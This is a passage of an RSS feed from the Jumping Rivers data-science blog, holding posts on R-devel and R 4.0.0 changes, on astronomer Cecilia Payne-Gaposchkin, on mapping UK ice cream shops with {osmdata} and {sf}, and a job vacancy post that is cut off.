&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; as.vector(mtcars[1:5,])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#$mpg&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] 21.0 21.0 22.8 21.4 18.7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#$cyl&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] 6 6 4 6 8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#$disp&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] 160 160 108 258 360&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is a breaking change; in previous versions of R, &lt;code&gt;as.vector()&lt;/code&gt; just
returned the data frame.&lt;/p&gt;
&lt;h2 id="changes-to-logical-functions"&gt;Changes to logical functions&lt;/h2&gt;
&lt;p&gt;This &lt;strong&gt;was&lt;/strong&gt; part of R 4.2.0, but has been bumped to R-devel as there
are around 200 packages that have to be updated.&lt;/p&gt;
&lt;p&gt;Similar to the &lt;code&gt;if()&lt;/code&gt; and &lt;code&gt;while()&lt;/code&gt; statements, the logical functions,
&lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; and &lt;code&gt;||&lt;/code&gt;, now give a warning when one of the comparisons has a
length greater than one:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Warning message:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In 1:2 &amp;amp;&amp;amp; 1 : &amp;#39;length(x) = 2 &amp;gt; 1&amp;#39; in coercion to &amp;#39;logical(1)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In future versions, this will become an error.&lt;/p&gt;
&lt;h2 id="trying-the-latest-version-out-for-yourself"&gt;Trying the latest version out for yourself&lt;/h2&gt;
&lt;p&gt;The &lt;a href="https://www.rocker-project.org/" rel="external"&gt;rocker&lt;/a&gt; project takes away the
pain of installing the latest version. If you have docker installed,
then simply use the &lt;code&gt;devel&lt;/code&gt; version:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-dockerfile" data-lang="dockerfile"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -ti rocker/r-ver:devel&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you want to use RStudio as well, then run&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-dockerfile" data-lang="dockerfile"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run -e &lt;span style="color:#79c0ff"&gt;PASSWORD&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&amp;lt;PASSWORD&amp;gt; -p 8787:8787 rocker/rstudio:devel&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="see-also"&gt;See also&lt;/h2&gt;
&lt;p&gt;Do you have some nostalgia for previous versions of R? If so, check out
our previous blog posts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-version-4-features/" rel="external"&gt;R 4.0.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/" rel="external"&gt;R 4.1.0&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/new-features-r420/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Forgotten Women in Science: Cecilia Payne-Gaposchkin</title><link>https://www.jumpingrivers.com/blog/women-in-science-cecilia-payne/</link><pubDate>Mon, 21 Mar 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/women-in-science-cecilia-payne/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/women-in-science-cecilia-payne/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/women-in-science-cecilia-payne/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;When starting out for a PhD, we all think (or at least wish) that we are going to make a paradigm shifting discovery. Unfortunately, this is usually not the case, but it has been known to happen.&lt;/p&gt;
&lt;p&gt;In 1925, &lt;a href="https://en.wikipedia.org/wiki/Cecilia_Payne-Gaposchkin" rel="external"&gt;Cecilia Payne&lt;/a&gt; obtained a PhD with her thesis entitled &lt;a href="https://articles.adsabs.harvard.edu//full/1925PhDT.........1P/0000001,006.html" rel="external"&gt;“Stellar Atmospheres: A contribution to the observational study of high temperature in the reversing layers of stars.”&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Prior to this work it had been generally accepted that stars were just bigger, hotter versions of earth, made of all the same stuff. By looking at the spectra of light coming from the sun, Cecilia Payne discovered that they are actually made of hydrogen and helium, and that hydrogen is in fact one million times more abundant than on earth, which drastically changed our view of the Universe and it’s formation.&lt;/p&gt;
&lt;p&gt;Despite her thesis being described as “undoubtedly the most brilliant PhD thesis ever written in astronomy,” she doubted the legitimacy of her discovery because it went against the general beliefs of the time, describing her own findings as “spurious” – impostor syndrome gets to us all!&lt;/p&gt;
&lt;p&gt;At the time of submitting her PhD thesis, Harvard University did not award doctorates to women – so instead, she became the first person to be awarded a doctorate from Radcliffe College of Harvard University. This is very reminiscent of her experience as an undergraduate at Cambridge University, who also did not award degrees to women, so despite doing all of the work required she was never awarded her degree in physics and chemistry.&lt;/p&gt;
&lt;p&gt;Later, Otto Struve, the person who spoke so highly of her thesis, came to the same conclusion as Payne-Gaposchkin through his own investigations, and while he did acknowledge her in the publications of his findings, he is usually the one credited with this amazing discovery.&lt;/p&gt;
&lt;p&gt;We’re lucky today that issues like this are far less prevalent – however, all is still not equal in the scientific world, with recent estimates giving approximately 258 years until gender equality is reached for physics in particular.&lt;/p&gt;
&lt;p&gt;My hope is that by shining a light on these excellent role models, I will be able to start conversations about gender equality in the sciences, how we’ve grown and where we still need to improve, as well hopefully inspiring the next generation of scientists to get out there and discover!&lt;/p&gt;
&lt;p&gt;Image credit: Acc. 90-105 - Science Service, Records, 1920s-1970s, Smithsonian Institution Archivess&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/women-in-science-cecilia-payne/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Forgotten features of R 4.0.0</title><link>https://www.jumpingrivers.com/blog/r-version-4-features/</link><pubDate>Tue, 25 Jan 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-version-4-features/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-version-4-features/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-version-4-features/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;R &lt;a href="https://cran.r-project.org/doc/manuals/r-release/NEWS.html" rel="external"&gt;version 4.0.0&lt;/a&gt; was released almost two years ago.
The change in the major version, 3.x.y to 4.0.0, represented significant and potentially
breaking changes.
For an organisation to start using these new features, everyone in the company must have access to that version; otherwise code isn&amp;rsquo;t shareable.
This naturally slows down adoption.&lt;/p&gt;
&lt;p&gt;We moved our internal R projects to depend on version R 4.0.0 around twelve months ago - a few
months after the release date.
Over the last year we&amp;rsquo;ve also assisted a number of clients in making the move;
typically with Shiny applications.
This post aims to highlight some of the features we&amp;rsquo;ve found useful and also some of the potential pitfalls.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-r-version-4-features"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="stringsasfactors"&gt;StringsAsFactors&lt;/h2&gt;
&lt;p&gt;From the &lt;a href="https://developer.r-project.org/Blog/public/2020/02/16/stringsasfactors/" rel="external"&gt;beginning&lt;/a&gt;, R converted imported strings to factors.
For most users, this typically occurred when reading in data using &lt;code&gt;read.csv()&lt;/code&gt;.
This default made sense for statistical modelling, but was a little
tricky for new users.
Especially as today&amp;rsquo;s data sets tend to have messy string data.&lt;/p&gt;
&lt;p&gt;In R 4.0.0, this default changed, with stringsAsFactors now being &lt;code&gt;FALSE&lt;/code&gt; by default.
For our internal applications, this didn&amp;rsquo;t really cause issues, but we&amp;rsquo;ve
had to help a number of clients &amp;ldquo;upgrade&amp;rdquo; their Shiny app to run using R version 4.0.0.
If you are planning on making this move, here&amp;rsquo;s our standard &amp;ldquo;gotcha&amp;rdquo; check-list:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Are there any calls to &lt;code&gt;read.csv()&lt;/code&gt;, &lt;code&gt;read.table()&lt;/code&gt; or &lt;code&gt;read.delim()&lt;/code&gt;? If so,
this could cause issues. You can either set &lt;code&gt;stringsAsFactors = TRUE&lt;/code&gt; in these
functions, or fix any issues that crop up.&lt;/li&gt;
&lt;li&gt;Are there any data frames saved as &lt;code&gt;rds&lt;/code&gt; files? If so, check the columns for factors.&lt;/li&gt;
&lt;li&gt;Do you use &lt;code&gt;data.frame()&lt;/code&gt; to create data frames? If so, factors might creep in.&lt;/li&gt;
&lt;li&gt;Do packages return data frames that you use? This is the trickiest bug to track down.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="raw-character-strings"&gt;Raw Character Strings&lt;/h2&gt;
&lt;p&gt;Using the syntax &lt;code&gt;r&amp;quot;(some characters)&amp;quot;&lt;/code&gt; we can now define literal strings.
This avoids the painful adding of backslashes when escaping special characters.
We&amp;rsquo;ve recently started using this regularly when generating PDF documents
that have LaTeX in them. For example,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r&lt;span style="color:#a5d6ff"&gt;&amp;#34;(Avoiding \texttt{backslash} and &amp;#34;&lt;/span&gt;speech mark&lt;span style="color:#a5d6ff"&gt;&amp;#34; hell.)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Avoiding \\texttt{backslash} and \&amp;#34;speech mark\&amp;#34; hell.&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Other uses are regular expressions and HTML code.&lt;/p&gt;
&lt;h2 id="caching-with-r_user_dir"&gt;Caching with R_user_dir()&lt;/h2&gt;
&lt;p&gt;Buried deep within the changelog was a reference to &lt;code&gt;R_user_dir()&lt;/code&gt; from the {tools} package.
This function provides a nice, cross-platform method for creating
directories that can be used to store R-related user-specific data, configuration and cache files.&lt;/p&gt;
&lt;p&gt;For example,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;R_user_dir&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;my_pkg&amp;#34;&lt;/span&gt;, which &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cache&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;/home/ncsg3/.cache/R/my_pkg&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;provides a string that can be used to create a directory.
In the {oysteR} package, I use this idea to &lt;a href="https://github.com/sonatype-nexus-community/oysteR/blob/master/R/cache.R" rel="external"&gt;cache API&lt;/a&gt; results.
As R generates the path, I don&amp;rsquo;t have to worry about which OS the user is on.&lt;/p&gt;
&lt;h2 id="also-of-note"&gt;Also of note&lt;/h2&gt;
&lt;p&gt;I&amp;rsquo;ve not used the new &lt;a href="https://developer.r-project.org/Refcnt.html" rel="external"&gt;reference counting&lt;/a&gt;
directly, but by switching to R 4.0.0 I&amp;rsquo;ve certainly benefited from a slightly faster, less resource-hungry version of R. Likewise, the {grid} package was improved, so {ggplot2} is
also a little quicker. This is one of the benefits of upgrading R versions;
things just get a bit nicer.&lt;/p&gt;
&lt;h3 id="references"&gt;References&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cran.r-project.org/doc/manuals/r-release/NEWS.html" rel="external"&gt;R Changelog&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;A &lt;a href="https://blog.revolutionanalytics.com/2020/04/r-400-is-released.html" rel="external"&gt;nice overview&lt;/a&gt; of R 4.0.0 by David Smith.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-version-4-features/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Thinking about maps and ice cream</title><link>https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/</link><pubDate>Tue, 21 Dec 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In November 2021, I took part in the third edition of the 30 Day Map
Challenge created by &lt;a href="https://twitter.com/tjukanov" rel="external"&gt;Topi Tjukanov&lt;/a&gt;.
Participants are given a theme for each day of November, and are tasked
with creating a map within that theme. Details of the challenge can be
found &lt;a href="https://30daymapchallenge.com" rel="external"&gt;here&lt;/a&gt;. My own contributions can be
found on
&lt;a href="https://github.com/nrennie/30DayMapChallenge/tree/main/2021" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Creating thirty maps was indeed a challenge, but over the course of the
month I developed a process for approaching the problem. This blog post
will focus more on my thought process behind creating maps (or any type
of plot) rather than the technical aspects of writing the code.&lt;/p&gt;
&lt;p&gt;I found it useful to at least loosely define what I wanted to get out of
taking part in the challenge. The main motivation for &lt;strong&gt;me&lt;/strong&gt;, was to
play around and learn some new packages for dealing with spatial data
since I hadn’t worked with that type of data before. For &lt;strong&gt;you&lt;/strong&gt;, it
might be something completely different e.g. making your first map,
developing better graphics, or exploring data sources.&lt;/p&gt;
&lt;p&gt;For example, I made the &lt;em&gt;same&lt;/em&gt; plot multiple times using different
tools. For day 3, I created &lt;a href="https://github.com/nrennie/30DayMapChallenge/blob/main/2021/scripts/Day_03_Polygons.R" rel="external"&gt;a map of Glasgow’s
population&lt;/a&gt;
using {ggplot2} and then &lt;a href="https://public.tableau.com/app/profile/nicola.rennie/viz/30DayMapChallenge2021/DBDay14" rel="external"&gt;recreated it using
Tableau&lt;/a&gt;
for day 14. The maps themselves didn’t teach me anything new about
Glasgow’s population, but I did learn about the main differences in
processing spatial data using R versus Tableau.&lt;/p&gt;
&lt;p align="center"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/ggplot.jpg" style="width:500px" alt="Population of Glasgow using ggplot2."/&gt;
&lt;img src="https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/tableau.png" style="width:500px" alt="Population of Glasgow using Tableau."/&gt;
&lt;/p&gt;
&lt;h2 id="thinking-about-themes"&gt;Thinking about themes&lt;/h2&gt;
&lt;p&gt;The only direction participants are given is the theme for each day. To
avoid bias of thinking about a theme for which I’ve already created a
map, I’ll go through my process with a new unseen theme: beaches. The
theme is the first thing I focused on. Otherwise, you can make a map
about absolutely anything which makes it really hard to settle on
something to plot. A bit like when you spend a lot of time browsing
Netflix but never actually pick anything to watch.&lt;/p&gt;
&lt;p&gt;I also narrowed my geographical focus for the challenge to just the
United Kingdom. “Create 30 maps of the UK” sounded less intimidating
than “create 30 maps”. I did that for this map too.&lt;/p&gt;
&lt;p&gt;Anyway, back to the theme of beaches. First, I tried to brainstorm a few
different ideas that could work. Sometimes an idea might be quite
obvious, other times more abstract…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Plotting British coastlines?&lt;/li&gt;
&lt;li&gt;Highlighting beaches suitable for swimming?&lt;/li&gt;
&lt;li&gt;Filming locations of the movie Beaches?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It’s also useful to choose a topic you’re interested in, especially if
you’re making maps for fun. Otherwise, what’s the point? For this map, I
settled on the semi-abstract topic of ice cream. No day at the beach is
complete without a 99, after all.&lt;/p&gt;
&lt;h2 id="digging-for-data"&gt;Digging for data&lt;/h2&gt;
&lt;p&gt;Unlike many other data visualisation challenges (such as
&lt;a href="https://github.com/rfordatascience/tidytuesday" rel="external"&gt;#TidyTuesday&lt;/a&gt;),
participants in the 30 Day Map Challenge need to find their own data
sources. The narrower geographical region I’d confined myself to, also
made it easier to find data as I was familiar with possible data
sources.&lt;/p&gt;
&lt;p&gt;For most of the maps I made, I needed at least two data sources: (i) a
background map, and (ii) some interesting data related to the theme to
overlay.&lt;/p&gt;
&lt;p&gt;Background maps of the UK are available from the &lt;a href="https://geoportal.statistics.gov.uk/" rel="external"&gt;Office for National
Statistics Geoportal&lt;/a&gt; (among other
places), and I reused these multiple times during the challenge. Reusing
it once more here won’t hurt.&lt;/p&gt;
&lt;p&gt;Whilst organisations like the Office for National Statistics have lots
of data on life in the UK, I couldn’t find a public data set
specifically on ice cream in the UK. Luckily, ice cream shops are
classified as an amenity by OpenStreetMap (a classification I firmly
agree with). OpenStreetMap is a collaborative project which aims to
create a free database of global geodata. It can be accessed directly
through the Overpass API, but it’s neatly wrapped into an R package
called {osmdata}.&lt;/p&gt;
&lt;p&gt;I used the {osmdata} package multiple times during the challenge because
it’s compatible with the {tidyverse} packages, including {ggplot2} so I
didn’t have to spend time formatting my data sources. The map I created
for the theme &lt;em&gt;red&lt;/em&gt; on day 6 of the 30 Day Map Challenge was a map of
all the post offices in the UK using OpenStreetMap data, the code for
which is available on
&lt;a href="https://github.com/nrennie/30DayMapChallenge/blob/main/2021/scripts/Day_06_Red.R" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p align="center"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/post_offices.jpg" style="width:500px" alt="Map of GB post offices"/&gt;
&lt;/p&gt;
&lt;p&gt;Unfortunately, OpenStreetMap returns a list of all ice cream shops
within a rectangular geographic area rather than within a chosen
country. It also returns some ice cream shops on the East coast of
Ireland, and a few in France as well. Some of the meta-data for the ice
cream shops is missing so there’s no easy way to filter them out. Given
the time constraints of the map challenge, I decided to ignore them. For
a more professional map, I’d spend the time removing those points.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Do you use RStudio Pro? If so, checkout out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;utm_medium=banner&amp;utm_campaign=2021-thinking-about-maps" rel="external"&gt;managed
RStudio&lt;/a&gt;
services&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="now-what"&gt;Now what?&lt;/h2&gt;
&lt;p&gt;At this stage, I have all the data I need. I often think it’s useful to
(loosely) define a question that your plot will answer. At the moment, I
have data on ice cream shops all over the UK. But I probably don’t want
to focus on all of them. The question I want to answer: &lt;em&gt;How many ice
cream shops are within a 10 mile radius of the Jumping Rivers office?&lt;/em&gt;&lt;/p&gt;
&lt;h2 id="making-maps"&gt;Making maps&lt;/h2&gt;
&lt;p&gt;There are a couple of technical aspects of creating maps that I had to
learn to make this map:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;transforming between coordinates systems. The OpenStreetMap data was
in the World Geodetic System coordinates, and the base maps were in
Ordnance Survey of Great Britain coordinate systems. To plot them
together, they both have to be in the same coordinate system.&lt;/li&gt;
&lt;li&gt;creating a circular area around the Jumping Rivers office and
determining which points were inside the 10 mile radius.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you’re an R user who is at all interested in working with spatial
data, then the {sf} package is your friend. It’s compatible with
{ggplot2} and I could create a basic map of my data using just those two
packages.&lt;/p&gt;
&lt;p align="center"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/start_plot.png" style="width:500px" alt="Map of ice-cream locations in the UK."/&gt;
&lt;/p&gt;
&lt;p&gt;In terms of design, the {patchwork} and {cowplot} packages are
invaluable for arranging multiple plots, and adding annotations outside
of the plot area. This is useful if you want to add some additional text
explaining your plot. Maps are almost always improved with a textual
explanation, and I don’t think all maps need to be completely
understandable without any text. For this map, I also used an inset
zoomed-in map to show the detail that you can’t see in the UK-wide map
alone.&lt;/p&gt;
&lt;p&gt;Then, with a little splash of colour to highlight the important aspects,
the final map is finished. Is it perfect? No. There are lots of little
things that I would like to fix about this map, and if I was using this
map for a project I would probably take the time to fix those things.
But with a challenge where you’re making a map every day, you need to
draw a line somewhere. And this is where I drew it today.&lt;/p&gt;
&lt;p align="center"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/final_plot.png" style="width:500px" alt="Map of ice-cream locations in the UK with JR office."/&gt;
&lt;/p&gt;
&lt;p&gt;If you’re curious, OpenStreetMap says that there are 26 ice cream shops
within a 10 mile radius of the &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;Jumping Rivers
office&lt;/a&gt; but I’m not sure the
data is completely reliable. That’s one of the pitfalls of using a
community generated dataset that I just have to accept for now.&lt;/p&gt;
&lt;h2 id="final-thoughts"&gt;Final thoughts&lt;/h2&gt;
&lt;p&gt;Taking part in the 30 Day Map Challenge was really beneficial, although
sometimes slightly stressful. I learnt a lot about finding data, got
better at plotting maps (mostly in R), and found out some cool facts
that might help me in a pub quiz one day. Next year, rather than
creating a map for the sake of ticking off a day, I’d like to spend more
time on each individual map and delve a bit deeper into some of the new
packages I find.&lt;/p&gt;
&lt;p&gt;If you’re looking for some inspiration when creating your own maps, I’d
recommend checking out the 30 Day Map Challenge
&lt;a href="https://30daymapchallenge.com" rel="external"&gt;website&lt;/a&gt; or searching the
&lt;a href="https://twitter.com/hashtag/30DayMapChallenge" rel="external"&gt;#30DayMapChallenge&lt;/a&gt; on
Twitter.&lt;/p&gt;
&lt;p&gt;If you’re interested in learning how to work with spatial data in R, the
&lt;a href="https://geocompr.robinlovelace.net/" rel="external"&gt;Geocomputation with R book&lt;/a&gt; is an
excellent free book, or you could come to our &lt;a href="https://www.jumpingrivers.com/training/course/r-spatial-analysis-sf-tmap-leaflet/" rel="external"&gt;Spatial Data Analysis
with
R&lt;/a&gt;
course.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Job vacancies at Jumping Rivers!</title><link>https://www.jumpingrivers.com/blog/job-vacancies-at-jumping-rivers/</link><pubDate>Wed, 15 Dec 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/job-vacancies-at-jumping-rivers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/job-vacancies-at-jumping-rivers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/job-vacancies-data-engineer-and-scientist/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In line with the continuous growth at Jumping Rivers, we are looking to
expand our team of dedicated professionals working in our teams. If you
are enthusiastic and keen to develop your skills in cutting edge data
science or infrastructure please read on!&lt;/p&gt;
&lt;h2 id="who-are-we-and-what-do-we-do"&gt;Who are we and what do we do?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt; is an analytics company
whose passion is data and machine learning. We help our clients move
from data storage to data insights. The company has three key strands:
training, data engineering and machine learning consultancy. As a small
company, the roles are rarely clear cut. We think this is a good thing;
the team get to experience different ideas and concepts, never stuck on
mundane tasks.&lt;/p&gt;
&lt;h2 id="where-are-we-based"&gt;Where are we based?&lt;/h2&gt;
&lt;p&gt;We are based in Newcastle upon Tyne in the &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;Catalyst
Building&lt;/a&gt; - home to the
&lt;a href="https://www.nicd.org.uk/" rel="external"&gt;National Innovation Centre for Data&lt;/a&gt;. But
half the company is remote (within the UK). We trust our team to manage
their own time. If you want to go a run in the afternoon and work later,
that’s fine with us!&lt;/p&gt;
&lt;p&gt;If you are based near Newcastle, then you can come into our office.
Alternatively, work where is convenient.&lt;/p&gt;
&lt;p&gt;We currently have three active job vacancies that we are accepting
applications for. The job titles and their corresponding specifications
can viewed by clicking on the links below:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://jumping-rivers.welcomekit.co/jobs/shiny-developer-uk-europe-remote_newcastle-upon-tyne_JR_Mo4LpRV" rel="external"&gt;Shiny Developer (UK Remote) (23/12/2021
deadline)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://jumping-rivers.welcomekit.co/jobs/data-science-instructor_newcastle-upon-tyne_JR_dMzD2lz" rel="external"&gt;Data Science Instructor (23/12/2021
deadline)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://jumping-rivers.welcomekit.co/jobs/graduate-data-scientist-training-uk-remote_newcastle-upon-tyne" rel="external"&gt;Graduate: Data Scientist + Training (UK Remote) (31/01/2022
deadline)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="dont-see-a-position-that-suits-your-skills"&gt;Don’t see a position that suits your skills?&lt;/h2&gt;
&lt;p&gt;Jumping Rivers is always looking for great talent. Send us an
&lt;a href="https://jumping-rivers.welcomekit.co/jobs/spontaneous-applications" rel="external"&gt;application&lt;/a&gt;
